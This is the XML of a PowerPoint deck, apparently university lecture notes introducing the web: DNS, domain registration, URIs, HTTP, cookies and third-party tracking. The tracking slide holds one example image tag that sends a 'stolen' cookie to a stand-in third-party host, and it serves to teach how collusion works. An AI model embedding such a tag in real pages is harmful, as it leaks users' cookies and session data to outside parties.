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9" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="309" r:id="rId3"/>
    <p:sldId id="334" r:id="rId4"/>
    <p:sldId id="336" r:id="rId5"/>
    <p:sldId id="337" r:id="rId6"/>
    <p:sldId id="338" r:id="rId7"/>
    <p:sldId id="339" r:id="rId8"/>
    <p:sldId id="340" r:id="rId9"/>
    <p:sldId id="341" r:id="rId10"/>
    <p:sldId id="335" r:id="rId11"/>
    <p:sldId id="342" r:id="rId12"/>
    <p:sldId id="343" r:id="rId13"/>
    <p:sldId id="344" r:id="rId14"/>
    <p:sldId id="346" r:id="rId15"/>
    <p:sldId id="345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6" r:id="rId26"/>
    <p:sldId id="357" r:id="rId27"/>
    <p:sldId id="358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70" autoAdjust="0"/>
    <p:restoredTop sz="94351" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="63" d="100"/>
          <a:sy n="63" d="100"/>
        </p:scale>
        <p:origin x="408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817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27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33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56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7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54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61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2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532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0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864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7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67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6CB03EA0-2F37-4F62-93D1-61BCD1BEDED7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7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03EA0-2F37-4F62-93D1-61BCD1BEDED7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00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  <p:sldLayoutId id="2147483901" r:id="rId12"/>
    <p:sldLayoutId id="2147483902" r:id="rId13"/>
    <p:sldLayoutId id="2147483903" r:id="rId14"/>
    <p:sldLayoutId id="2147483904" r:id="rId15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593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593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.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://it.wikipedia.org/wiki/Bastion_host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Overview of the </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>World Wide Web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UT CS361S – Network Security and Privacy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Spring 2021</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lecture Notes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="166104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FE39FA5-F465-4B4E-B519-43A0A09DC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0"/>
            <a:ext cx="83200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258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9720B-C043-43CE-845A-A061E93D5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Resource Identifiers (URIs)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BF85CEB-EBE2-4E9A-9593-F9031102D1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97" y="2438400"/>
            <a:ext cx="7835662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469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URL Components">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3492A07-AF36-4243-A8CA-4F8969F61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8382000" cy="3629771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5499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Query String Components">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{831A6030-57E2-42D2-879C-B908FBB9C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828800"/>
            <a:ext cx="8564217" cy="35814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471571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FF5AB-C56F-42D5-8E65-D99830DBE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vs Relative URI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318F0-41D0-46A7-8DE7-5B3526EFC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i="1" dirty="0"/>
              <a:t>Absolute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> paths begin with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>&lt;scheme&gt;://host/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>http://www.google.com/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Everything else is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0"/>
              <a:t>relative</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>/not/an/absolute/path</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>The scheme and host are determined by context</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4008639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794EC-8509-441E-A359-A46CC80EE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B6B605F-627A-49BB-A9D0-590434759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47800"/>
            <a:ext cx="6964964" cy="522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669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0650E-8ADF-4E72-9488-F361A339E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186D769-86E0-43B0-8271-A58B161F8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4" y="2412934"/>
            <a:ext cx="8277232" cy="313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52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366A8-BBEA-4939-B9A3-18CA3F9F9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Web Page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07795-0C74-4632-9169-7E7898DCB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&lt;HTML&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;BODY&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;H1&gt;Simple Web Page&lt;/H1&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;IMG SRC=“/images/image1.jpg”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;/BODY&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="20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987276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5DF2-23A4-4D0F-BE75-3108780AB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a Web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83D1B-0DAD-4DD3-96C6-FAAA49EC3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Browser requests HTML “root” page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Root page has links for images, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Browser requests embedded objects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Browser integrates and renders objects</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="77910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396427-3467-4034-ABFB-306C4570F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7" y="0"/>
            <a:ext cx="84848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84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World Wide Web?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000" b="1" i="1" dirty="0"/>
              <a:t>Internet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> - globally interconnected network system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0"/>
              <a:t>World Wide Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> - HTTP-based content, apps, “ecosystem”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3847126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C00B-7CD4-4ECA-A8D1-6EA8C438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6B240-03D5-4320-95FE-694FFCED8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88E701-2F1E-4B0D-B3AC-17E829838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34" y="0"/>
            <a:ext cx="85999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824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B1F89-1AA7-4B53-ACF6-0E215AF3E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825E4-8E86-4B4F-BD35-CDB9F9479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“stack” of software needed to run a web server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Typically: O/S, web server, database, scripting engines,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Very Common: LAMP:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Apache</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MySQL DB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/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997032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EB928-8202-46E1-90E6-B95B4B3BE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2.0 and Beyond</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6146" name="Picture 2" descr="The Web 2.0 Mashup Ecosystem Ramps Up | All the details here… | Flickr">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7270AE3E-F9AA-430C-B859-71F867A03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52600"/>
            <a:ext cx="6886203" cy="488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219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1C7C-9CC2-437D-9724-94C45862F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19C92-10F1-48FA-8D5D-43391C6C9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HTTP is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" u="sng" dirty="0"/>
              <a:t>STATELESS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>A webserver doesn’t “connect” requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>To simulate a “session”, use cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Put “cookie: &lt;session id&gt;” in request/response header</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2630854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5EBBD-2829-4C77-A041-A512523FA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Idea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41E70D-DFE9-4F8E-8036-987E14035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3418" y="2913808"/>
            <a:ext cx="3193997" cy="2420192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4FB2E7-B613-488D-A016-8602E563C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3081041"/>
            <a:ext cx="2943636" cy="11241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EEE07D-C718-42E3-8B5A-197B349C6F0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1082505" y="3124200"/>
            <a:ext cx="21723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Browser 1: google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Browser 2: google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94F7588-F710-470A-8175-41644EA0C575}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752600" y="1628030"/>
            <a:ext cx="5562600" cy="128577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GET \ HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Cookie: ac39f210ef120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1C1F5EE-5C40-4A7D-B198-DE69F2D44783}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752600" y="5220699"/>
            <a:ext cx="5562600" cy="128577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GET \ HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Cookie: 9b8dde1783ff3e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63885061-9AA7-4CF9-A583-319A80F6A286}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3893510" y="3048000"/>
            <a:ext cx="1811387" cy="457200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Page 1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87E2B29D-9AC6-417F-BFB8-7AF4420D54BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3930827" y="3733800"/>
            <a:ext cx="1811387" cy="457200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Page 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="613571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1356E-C0FC-4D79-9FFB-92B0229C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 and Domains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8C64A-85AA-4067-91A0-B13B9A4BC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Cookies are most assigned by domain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>For example, “google.com” cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>This is important for security and privacy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4152517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F13C2-016A-425B-AD7D-B487DA1D7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First-Party, Third Party</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7170" name="Picture 2" descr="browser4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33DF2DDE-B5EF-4400-92F9-E006A4C3D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0"/>
            <a:ext cx="728513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896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ACC39-3A73-403B-BB21-3CFEA59A5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companies track?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0D6F5-58F3-4703-B965-B57031264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First-party façade:  advertising_company.amazon.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Collusion: first-party, third-party share data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>First-party can send data to third-party in URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>&lt;IMG </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>=“http://third-party?cookie=stolen”&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3071385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55093-982B-40A6-B7D5-A887F5BA1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Tech: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Domain Name System (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="1" dirty="0"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1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AD11B-FB82-4E32-BF45-E04804624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IPv4 addresses were hard to remember/use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>IPv6 are worse</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Humans need semantically meaningful addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>DNS maps IP addresses to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0"/>
              <a:t>domain names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7119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5EBBD-2829-4C77-A041-A512523FA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Idea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41E70D-DFE9-4F8E-8036-987E14035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3418" y="2913808"/>
            <a:ext cx="3193997" cy="2420192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081977-AC99-4EDB-BEBE-7938349F22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760203" y="446807"/>
            <a:ext cx="2590800" cy="1752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823699-F53E-4C02-8FAB-EE183D0857B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6300428" y="2174570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DNS SERVER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4FB2E7-B613-488D-A016-8602E563CC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3786" y="5029200"/>
            <a:ext cx="2943636" cy="11241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3D632C-EAC7-4FB1-A429-A236F223D212}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6088031" y="6148307"/>
            <a:ext cx="1935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142.250.138.138</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>(google.com)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EEE07D-C718-42E3-8B5A-197B349C6F0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1082505" y="3124200"/>
            <a:ext cx="2295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http://google.com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3186404-BD60-4202-B0CD-CE9E3F82724E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19694554">
            <a:off x="3029482" y="1752893"/>
            <a:ext cx="3317704" cy="48463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Where is “google.com?”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6B0DA1E5-46EB-4FD4-A0D4-831AA7A1C65E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19743730">
            <a:off x="3559117" y="2147946"/>
            <a:ext cx="2819400" cy="545068"/>
          </a:xfrm>
          <a:prstGeom prst="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142.250.138.138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5C94B5D-6885-4BE1-A209-BF76A1413D59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1442206">
            <a:off x="3675377" y="4754619"/>
            <a:ext cx="2025914" cy="48463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GET / HTTP/1.1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29296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C1CA7D3-490C-4FA0-9BB5-DA1A540BD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70" y="762000"/>
            <a:ext cx="818906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00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2E21A-D8E5-4B1D-95C7-F87FA665E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Level Domains (TLDs)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EDFC1-2BD4-4991-A21E-F360F4BD9F4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Generic Top Level Domain (gTLD) - .com, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, et</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Country code Top Level Domain (ccTLD) - .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>uk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32256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7907C-3538-4006-953B-1A137C5D9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TLD Name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1FA7B-BD21-4CBF-BC9F-0C108CB2C98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000" dirty="0"/>
              <a:t>Registrars administer TLDs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>For gTLDs, this is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0"/>
              <a:t>business</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> with pros and cons</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Registrars authorize “domain name registrars”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872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C8921-A64E-48A5-9434-F551FDD17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Name Registration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29E47-CDD2-43A5-92FD-271CC6E43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Party requests SLD + TLD from domain name reseller</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Party submits “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>whois</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>” information (contact info)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Registrar verifies that name is available</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Registrar stores relevant data in registry and DNS servers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3343155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5A801-FFE5-48E1-A176-12E2FFBA3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and Address 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F6EDB-B2D7-4346-B522-1B482643B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DNS is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0"/>
              <a:t>recursive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0"/>
              <a:t>hierarchical</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Recursive – DNS server searches another DNS server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Hierarchical –</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Root Domain to TLD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>TLD to Subdomain</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37111329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3318</TotalTime>
  <Words>523</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>93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Century Gothic</vt:lpstr>
      <vt:lpstr>Wingdings 2</vt:lpstr>
      <vt:lpstr>Quotable</vt:lpstr>
      <vt:lpstr>Overview of the  World Wide Web</vt:lpstr>
      <vt:lpstr>What is the World Wide Web?</vt:lpstr>
      <vt:lpstr>Key Tech:  Domain Name System (DNS)</vt:lpstr>
      <vt:lpstr>Basic Idea</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Top Level Domains (TLDs)</vt:lpstr>
      <vt:lpstr>TLD Name Management</vt:lpstr>
      <vt:lpstr>Domain Name Registration</vt:lpstr>
      <vt:lpstr>DNS and Address Resolution</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Uniform Resource Identifiers (URIs)</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Absolute vs Relative URI</vt:lpstr>
      <vt:lpstr>HTTP Request</vt:lpstr>
      <vt:lpstr>HTTP Response</vt:lpstr>
      <vt:lpstr>Static Web Page Example</vt:lpstr>
      <vt:lpstr>Rendering a Web Page</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Web Stack</vt:lpstr>
      <vt:lpstr>Web 2.0 and Beyond</vt:lpstr>
      <vt:lpstr>Cookies</vt:lpstr>
      <vt:lpstr>Basic Idea</vt:lpstr>
      <vt:lpstr>Cookies and Domains</vt:lpstr>
      <vt:lpstr>First-Party, Third Party</vt:lpstr>
      <vt:lpstr>How do companies track?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Usable Security Design</dc:title>
  <dc:creator>Seth Nielson</dc:creator>
  <cp:lastModifiedBy>Seth Nielson</cp:lastModifiedBy>
  <cp:revision>92</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-01-16T20:48:15Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-04-12T16:36:19Z</dcterms:modified>
</cp:coreProperties>
</file>